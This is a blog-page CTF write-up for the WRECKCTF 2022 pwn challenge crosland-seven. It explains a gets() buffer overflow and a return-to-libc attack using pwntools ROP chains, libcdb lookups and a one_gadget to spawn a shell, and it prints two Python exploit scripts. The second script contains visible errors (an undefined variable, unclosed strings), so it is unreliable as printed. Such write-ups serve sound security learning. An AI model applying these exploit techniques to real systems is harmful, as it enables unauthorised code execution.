<!DOCTYPE html>
<html lang="en">

    <head><title>WRECKCTF 2022 - pwn/crosland-seven &ndash; einSimon</title>
<meta name="description" content="A website where I will post stuff that I think of being somewhat intersting.">

<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8"/>



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha512-1sCRPdkRXhBV2PBLUdRb4tMg1w2YPf37qatUFeS7zlBy7jJI8Lf4VHwWfZZfpXtYSLy85pkm9GaYVYMfw5BC1A==" crossorigin="anonymous" />


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.9.1/css/academicons.min.css" integrity="sha512-b1ASx0WHgVFL5ZQhTgiPWX+68KjS38Jk87jg7pe+qC7q9YkEtFq0z7xCglv7qGIs/68d3mAp+StfC8WKC5SSAg==" crossorigin="anonymous" />


<link rel="stylesheet" href="https://einSimon.codeberg.page/css/colour/gruvbox-dark.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/colour/dark-mode.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/risotto.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/custom.css">
</head>

    <body>
        <div class="page">

            <header class="page__header"><h1 class="page__logo"><a href="https://einSimon.codeberg.page" class="page__logo-inner">einSimon</a></h1>
<nav class="page__nav main-nav">
    <ul>
    
    
    <li class="main-nav__item"><a class="nav-main-item" href="/about/" title="">About</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/blog/" title="">Blog</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/writeups/" title="">CTF-WriteUps</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/projects/" title="">Projects</a></li>
    
    </ul>
</nav>

</header>

            <section class="page__body">
    <header class="content__header">
        <h1>WRECKCTF 2022 - pwn/crosland-seven</h1>
    </header>
    <div class="content__body">
        <p><em>crosland is way taller than gilbert, now I can get some real studying done</em></p>
<p><strong>crosland-seven</strong> is another rather simple, straight forward challenge from the <em>pwn</em> category.</p>
<h1 id="gathering-information">Gathering information:</h1>
<p>There is not much to see after decompiling the <a href="../crosland">provided binary</a> with Binary Ninja, as there is only the <code>main</code> function:</p>
<p><img src="../main.png" alt="main"></p>
<p>What is interesting here is the <code>buffer</code> and the unsafe C function <code>gets</code> which we can abuse to overwrite the buffer. A look into Binary Ninja&rsquo;s Stack view also reveales the buffers size and whether canary is enabled or not:</p>
<p><img src="../mainStack.png" alt="mainStack"></p>
<p>Here it would also be interesting to run <code>checksec</code> to see if <code>NX</code> is disabled or we have no <code>PIE</code> etc.</p>
<p><img src="../checksec.png" alt="checksec"></p>
<p>As <code>NX</code> is enabled we can not write any executable shellcode, but with <code>PIE</code> disabled we can do some fun return-oriented-programming and therefore perform a so-called &ldquo;<em>return2libc</em>&rdquo; attack where we abuse existing code in the libc to spawn a shell.
But for this to work we need the libc running on the server, which is unfortunately not provided. However, we can leak some addresses and then search for the specific libc version using a libc data base.</p>
<h1 id="leaking-libc">Leaking libc:</h1>
<p>It is usually enough to leak two or three addresses of libc functions as they are usually version specific and will allow us to find out, which libc version is running on the remote server. Functions we could call would be <code>puts</code>, <code>gets</code>, and <code>setbuf</code> as we know, that they are present in the main function.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">leakLibc</span>() <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>:
    connection, elf <span style="color:#f92672">=</span> getConnection()
    
    <span style="color:#75715e"># Create ROP Chain</span>
    rop <span style="color:#f92672">=</span> ROP(elf)
    rop<span style="color:#f92672">.</span>puts(elf<span style="color:#f92672">.</span>got<span style="color:#f92672">.</span>puts)	<span style="color:#75715e"># Leak puts address</span>
    rop<span style="color:#f92672">.</span>puts(elf<span style="color:#f92672">.</span>got<span style="color:#f92672">.</span>gets)	<span style="color:#75715e"># Leak gets address</span>
    rop<span style="color:#f92672">.</span>puts(elf<span style="color:#f92672">.</span>got<span style="color:#f92672">.</span>setbuf)	<span style="color:#75715e"># Leak setbuf address</span>
    
    payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span>	<span style="color:#75715e"># Overflow the buffer</span>
    payload <span style="color:#f92672">+=</span> rop<span style="color:#f92672">.</span>chain()	<span style="color:#75715e"># Add our ROP chain to the payload</span>

    connection<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;today?&#34;</span>, payload)
    _ <span style="color:#f92672">=</span> connection<span style="color:#f92672">.</span>recvline()	<span style="color:#75715e"># We are not interested in these two garbage values</span>
    _ <span style="color:#f92672">=</span> connection<span style="color:#f92672">.</span>recvline()

    <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">convertToAddress</span>(inp: bytes) <span style="color:#f92672">-&gt;</span> int:
	<span style="color:#e6db74">&#34;&#34;&#34;A function that will parse the received address into an usable integer&#34;&#34;&#34;</span>
	address <span style="color:#f92672">=</span> inp<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
	address <span style="color:#f92672">=</span> inp<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">8</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span>)
	<span style="color:#66d9ef">return</span> u64(address)

    putsLeak <span style="color:#f92672">=</span> convertToAddress(connection<span style="color:#f92672">.</span>recvline())
    getsLeak <span style="color:#f92672">=</span> convertToAddress(connection<span style="color:#f92672">.</span>recvline())
    setbufLeak <span style="color:#f92672">=</span> convertToAddress(connection<span style="color:#f92672">.</span>recvline())

    <span style="color:#75715e"># Print leaked values</span>
    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;puts address: </span><span style="color:#e6db74">{</span>hex(putsLeak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;gets address: </span><span style="color:#e6db74">{</span>hex(getsLeak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;setbuf address: </span><span style="color:#e6db74">{</span>hex(setbufLeak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)    
</code></pre></div><p>Running this function reveales:</p>
<p><img src="../leakedAddresses.png" alt="leakedAddresses"></p>
<p>Now we need to look up these addresses on order to find the libc version. We can do that with pwntools (version &gt;= <code>4.9.0</code>) in the command line using the <code>libcdb</code> command. Notice that we only need to enter the last three positions as the rest would not be helpfull due to ASLR.</p>
<pre tabindex="0"><code>libcdb lookup puts 420 gets 970 setbuf ad0
</code></pre><p>This gives us two different libc versions we will have to try</p>
<p><img src="../libcs.png" alt="libcs"></p>
<p>Using the libc&rsquo;s <code>BuildId</code> we can use</p>
<pre tabindex="0"><code>libcdb hash -t buildid &lt;build-id&gt; --download-libc --unstrip
</code></pre><p>to download the libc with the specified <code>&lt;build-id&gt;</code> (I will make a wild guess and use the newer one).</p>
<p>Instead of regular rop chaining to spawn a shell I will use <a href="https://github.com/david942j/one_gadget"><code>one_gadget</code></a> to find a single gadget to spawn a shell as I find this to be easier to debug. Running <code>one_gadget one_gadget libc6_2.31-0ubuntu9.9_amd64.so</code> we get three options to choose from. So let&rsquo;s write the actual exploit.</p>
<h1 id="writing-exploitexploitpy">Writing <a href="../exploit.py">exploit</a></h1>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">exploit</span>() <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>:
    connection, elf <span style="color:#f92672">=</span> getConnection()
    libc <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;libc6_2.31-0ubuntu9.9_amd64.so&#34;</span>)

    <span style="color:#75715e"># ROP Chain to leak the address of puts</span>
    rop <span style="color:#f92672">=</span> ROP(elf)
    rop<span style="color:#f92672">.</span>puts(elf<span style="color:#f92672">.</span>got<span style="color:#f92672">.</span>puts)	<span style="color:#75715e"># print the address of puts using puts</span>
    rop<span style="color:#f92672">.</span>main()			<span style="color:#75715e"># return to the main function</span>
    log<span style="color:#f92672">.</span>info(rop<span style="color:#f92672">.</span>dump())
    payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span>	<span style="color:#75715e"># fill buffer</span>
    payload <span style="color:#f92672">+=</span> rop<span style="color:#f92672">.</span>chain()
    connection<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;today?&#34;</span>, payload)
    _ <span style="color:#f92672">=</span> connection<span style="color:#f92672">.</span>recvline()	<span style="color:#75715e"># not interested in these two garbage lines</span>
    _ <span style="color:#f92672">=</span> connection<span style="color:#f92672">.</span>recvline() 
   
    putsLeak <span style="color:#f92672">=</span> u64(connection<span style="color:#f92672">.</span>recvline()<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)<span style="color:#f92672">.</span>ljust(<span style="color:#ae81ff">8</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">)</span>
    libc<span style="color:#f92672">.</span>address <span style="color:#f92672">=</span> gotLeak <span style="color:#f92672">-</span> libc<span style="color:#f92672">.</span>sym<span style="color:#f92672">.</span>puts
    log<span style="color:#f92672">.</span>success(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;libc base address at </span><span style="color:#e6db74">{</span>hex(libc<span style="color:#f92672">.</span>address)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)

    payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span>	<span style="color:#75715e"># fill buffer</span>
    onegadget <span style="color:#f92672">=</span> p64(<span style="color:#ae81ff">0xe3b01</span> <span style="color:#f92672">+</span> libc<span style="color:#f92672">.</span>address)	<span style="color:#75715e"># onegadget address (found with one_gadget)</span>
    connection<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;today?, payload + onegadget )</span>

    connection<span style="color:#f92672">.</span>clean()
    connection<span style="color:#f92672">.</span>interactive()
   
</code></pre></div><p>Finally running this script will spawn us a shell with which we can get the flag:
<img src="../exploitSuccess.png" alt="exploitSuccess"></p>

    </div>
    <footer class="content__footer"></footer>

            </section>

            <section class="page__aside">
                <div class="aside__about">
<div class="aside__about">
    
<h1 class="about__title">Info</h1>
<p class="about__description">A website where I will post stuff that I think of being somewhat intersting.</p>
</div>


<ul class="aside__social-links">
    
</ul>
</div>
                <hr>
                <div class="aside__content">
    
    
        <p>
            
            2022-10-03
        </p>
    

                </div>
            </section>

            <footer class="page__footer"><p class="copyright"></p>
<p class="advertisement">Powered by <a href="https://gohugo.io/">hugo</a> and <a href="https://github.com/joeroe/risotto">risotto</a>.</p>
</footer>

        </div>
    </body>

</html>
